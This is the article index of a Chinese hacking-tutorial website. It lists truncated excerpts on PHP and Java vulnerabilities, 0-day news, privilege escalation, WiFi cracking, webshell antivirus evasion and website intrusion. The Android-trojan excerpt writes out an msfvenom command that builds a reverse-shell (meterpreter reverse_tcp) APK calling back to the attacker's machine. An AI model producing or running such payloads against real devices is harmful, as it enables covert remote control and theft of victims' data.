中文黑客网 - 黑客技术教程学习基地 - CNHACK - 中文黑客网 中文黑客网 - 黑客技术教程学习基地 - CNHACK - 中文黑客网

作者 中文黑客网 的所有文章

代码审计

细说变量覆盖那些事

5

中文黑客网 发布于 4-18

前言最近在挖洞和看一些ctf题目中可以看到一些变量覆盖的知识点,之前对这个方面学习的有点不全面,虽然网上有这方面的文章,但是感觉讲的不是很全面,所以就决定写一篇文章来总结这方面的知识。本文涉及相关实验:PHP安全之变量覆盖漏洞  (通过该实验,详细了解PHP中变量覆盖漏洞相关的知识。如:$$使用不当,extract()函数使用...

阅读(151) 评论(0)

黑客新闻

微信被曝高危0day漏洞,建议立即更新

2

中文黑客网 发布于 4-18

4月16日,微信PC版客户端被曝存在一个高危等级的在野0day漏洞。黑客只需要通过微信发送一个特制web链接,用户一旦点击链接,微信PC(windows)版进程wechatweb.exe便会加载shellcode执行,整个过程无文件落地,无新进程产生。相关安全团队检测出wechatweb.exe存在内存恶意代码,继而排查出了0day漏洞,并在第一...

阅读(343) 评论(0)

暂无分类

红蓝对抗提权篇之一文看懂提权

40

中文黑客网 发布于 4-18

一、计算机中的权限1.1不同的权限系统权限在不同的应用中有着不同的分类,与安全相关的大致上我们分为:匿名访问权限来宾权限用户权限管理员权限系统权限不同的权限对应的权力各不相同,我们对自己电脑一般是用户权限和管理员权限。1.2什么情况下用到提权一般会产生提权的原因是因为当前权限无法做到我们需要做到的事情。例如:普通用户权限会有很多限制,无法做到自己...

阅读(163) 评论(0)

代码审计

探探JDBC反序列化漏洞

6

中文黑客网 发布于 4-18

漏洞复现文章开始,先带大家复现JDBC反序列化漏洞我修改了原文:https://xz.aliyun.com/t/8159 的mysql恶意服务启动代码,如下#-*-coding:utf-8-*-importsocketimportbinasciiimportosimportsysimportsubprocessdefreceive_da...

阅读(149) 评论(0)

黑客新闻

Chrome和Edge远程代码执行0Day漏洞曝光

2

中文黑客网 发布于 4-16

北京时间4月13日凌晨,安全研究人员RajvardhanAgarwal在推特上发布了一个可远程代码执行(RCE)的0Day漏洞,该漏洞可在当前版本的谷歌Chrome浏览器和微软Edge上运行。RajvardhanAgarwal推特截图Agarwal发布的漏洞,是基于Chromium内核的浏览器中V8JavaScript引擎的远程代码执行漏洞,同时...

阅读(212) 评论(0)

渗透测试

漏洞分析:OpenVAS中的本地提权漏洞

6

中文黑客网 发布于 4-16

写在前面的话虽然本文涉及到的并非一个常见的场景,但如果在渗透测试过程中,你可以通过一个拥有sudo权限的用户来执行OpenVAS的话,你就可以利用本文介绍的技术来实现提权并拿到root。在这篇文章中,我们将介绍ixie关于OpenVAS工作流的内容,然后深入探讨如何利用其中存在的问题实现本地权限提升。OpenVAS工作流背景知识OpenVAS是目...

阅读(127) 评论(0)

黑客技术

黑客报道:Chrome再次被曝0day漏洞

3

中文黑客网 发布于 4-16

一波未平一波又起,4月13日有安全人员在Twitter上公布了Chrome的0day漏洞PoC。该漏洞可以启动计算器应用程序,一时间好友圈里都被计算器刷屏了。但没想到仅隔一天,在4月14日,Chrome又被曝了第二个0day漏洞。并且其PoC同样也被安全人员在Twitter上公开。据悉,该漏洞影响了Chrome最新正式版(89.0.4389.12...

阅读(177) 评论(0)

代码审计

php代码审计之PbootCMS漏洞审计

27

中文黑客网 发布于 4-12

PbootCMS漏洞审计一、环境准备下载地址:https://gitee.com/hnaoyun/PbootCMS/releases/V1.2.1解析域名:http://www.pboot.cms/这个系统很方便默认情况下,直接下载下来什么都不用做即可使用。(前提是开启phpsqlite扩展)我们将其改为mysql数据库使用。mysql新建数据库...

阅读(129) 评论(0)

黑客技术

黑客技术学习:不同黑客入侵网站的基本步骤是什么?

1

中文黑客网 发布于 4-12

如何入侵指定网站,入侵网站应该有什么样的步骤,相信很多朋友都不知道黑客是如何入侵网站的,接下来黑客信息网来给大家科普科普不同的黑客都是怎么样去入侵网站的,首先入侵指定网站是需要条件的,入侵前一定要先观察这个网站是动态还是静态的。介绍下什么样站点可以入侵:我认为必须是动态的网站如ASP、PHP、JSP等代码编写的站点,如果是静态的(.htm或htm...

阅读(288) 评论(0)

黑客新闻

领英5亿数据被黑客在暗网出售

3

中文黑客网 发布于 4-11

在Facebook5亿数据泄露事件发生后,近日,在某知名黑客论坛有黑客发帖出售5亿领英用户数据,并提供了200万数据记录作为证明。用户只要支付价值2美元的论坛积分就可以查看泄露的数据样本,黑客可能会以4位数字的比特币拍卖更大的5亿领英用户数据库。4个泄露的文件中包含有领英用户的信息,包括全名、邮件地址、手机号码、工作地址等信息。发帖者称数据是从领...

阅读(296) 评论(0)

黑客技术

aircrack-ng无线网WIFI破解教程

11

中文黑客网 发布于 4-9

一直准备找个时间来写个wifi破解教程,因为很多人都想学wifi破解,但是网上的教程都太乱,而且弄来弄错容易错,那是对于wifi破解的原理没有充分的认识,这次准备纯码字给大家通俗的讲解wifi破解,破解工具以aircrack-ng为例,这是一个很强大且具有代表性的工具,网上很多其他的破解工具都是基于aircrack-ng的。名词解释无线AP:发射...

阅读(402) 评论(0)

黑客技术

使用kali生成木马入侵安卓手机

7

中文黑客网 发布于 4-9

行动开始先查看kali的ip,我的是1.114 然后输入命令:msfvenom-pandroid/meterpreter/reverse_tcpLHOST=你kali的ipLPORT=5555R>/root/apk.apk5555是设置的端口,可以自己更改  显示这个说明已经生成成功了 然后启动msf...

阅读(432) 评论(0)

渗透测试

绕过白名单检查实现文件上传

28

中文黑客网 发布于 4-9

文件上传指将客户端数据以文件形式封装,通过网络协议发送到服务器端。在服务器端解析数据,最终在服务端硬盘上作为真实的文件保存。了解文件上传漏洞产生的原因,掌握漏洞的利用方法。预备知识1.  文件上传漏洞简介     通常web站点会有用户注册功能,而当用户登录之后大多数情况下会存...

阅读(139) 评论(0)

黑客技术

从Web日志还原SQL注入拖走的数据

1

中文黑客网 发布于 4-8

利用SQL注入漏洞拖库,从而导致数据泄漏。一般的排查方式,我们可以使用关键字进行搜索,找到可疑的url尝试进行漏洞复现,通过Web访问日志来还原攻击路径,从而确定问题的根源。但是,有一个问题却一直困扰着我,攻击者通过SQL注入漏洞到底获取了什么数据?是所有的数据,还只是访问了其中的一张表?理论上,假设所有的url参数请求日志都记录完整的话,只需要...

阅读(145) 评论(0)

黑客技术

常见网站劫持案例及解析

3

中文黑客网 发布于 4-8

攻击者在入侵网站后,常常会通过恶意劫持流量来获取收益,从而实现流量变现。有一些黑帽劫持的手法堪称防不胜防,正常的访问行为很难发现异常。今天给大家分享一下常见的网站劫持手法和排查思路。我们可以按照基于不同隐藏目的的常见劫持手法,来做一个简单的分类:1、将爬虫与用户正常访问分开,实现搜索引擎快照劫持2、将移动端与PC端的访问分开,实现移动端的流量劫持...

阅读(176) 评论(0)

黑客技术

自主搭建的三层网络域渗透靶场打靶记录

62

中文黑客网 发布于 4-3

前言假期马上结束了,闲暇之时我自己尝试着搭建了一个内网渗透的靶场。靶场是根据比较新的漏洞进行搭建的,质量自以为还可以。目前此靶场已在vulnstack开源,下载链接:http://vulnstack.qiyuanxuetang.net/vuln/detail/9/文中若有不当之处还请各位大佬多多点评我的博客:https://whoamianony...

阅读(177) 评论(0)

黑客技术

2021年黑客攻防演练信息收集实战技巧

17

中文黑客网 发布于 4-3

前言攻防演练里最重要的环节莫过于信息收集,熟话说,要想打点打得好,信息收集少不了。在各大公司招兵买马之际,各位师傅也来查缺补漏,信息收集你真的都会了嘛?搜索引擎这里我们使用fofa来举例,为什么使用fofa来举例呢,不是因为fofa有多好(真香),是因为咱只买了fofa的会员。fofa既可以搜索到部分子域名,也可以搜索到目标的各种系统,如OA、后...

阅读(211) 评论(0)

黑客技术

黑客技术webshell免杀的技巧

15

中文黑客网 发布于 3-27

0x00:前言由于杀软的规则在不断更新所以很多之前的过杀软方法基本上都不行了而且随着php7逐渐扩张assert马也将被淘汰所以本文将提出几种免杀思路效果很好而且不会被杀软的正则和沙盒规则约束。0x01:自定义加密Bypass部分杀软会直接将一些编码函数如Base64、编码后的关键字或组合函数加入了规则比如某dir+比如这个都能被检测出是shel...

阅读(276) 评论(0)

黑客技术

黑客基本术语

中文黑客网 发布于 3-27

溢出:确切的讲,应该是“缓冲区溢出”。简单的解释就是程序对接受的输入数据没有执行有效的检测而导致错误,后果可能是造成程序崩溃或者是执行攻击者的命令。大致可以分为两类:(1)堆溢出;(2)栈溢出。弱口令:指那些强度不够,容易被猜解的,类似123,abc这样的口令(密码)社工:社会工程学一种通过对受害者心理弱点、本能反应、好奇...

阅读(283) 评论(0)

黑客技术

新人零基础接触黑客知识的学习方法

中文黑客网 发布于 3-21

今天有许多人问我:“我看了你的文章了,但是我是新人,有没有什么学习方法啊?”我回答的是;“当然有啊,不过人和人不同,方法是自己总结出来的,就和我前面文章中介绍的名词一样,都是我在学习中根据自己的经验和对他的认识总结出来的。”下面呢我就把我自己的学习经验写出来给大家参考下,大家可以根据我的方法去总结套...

阅读(422) 评论(0)

sitemap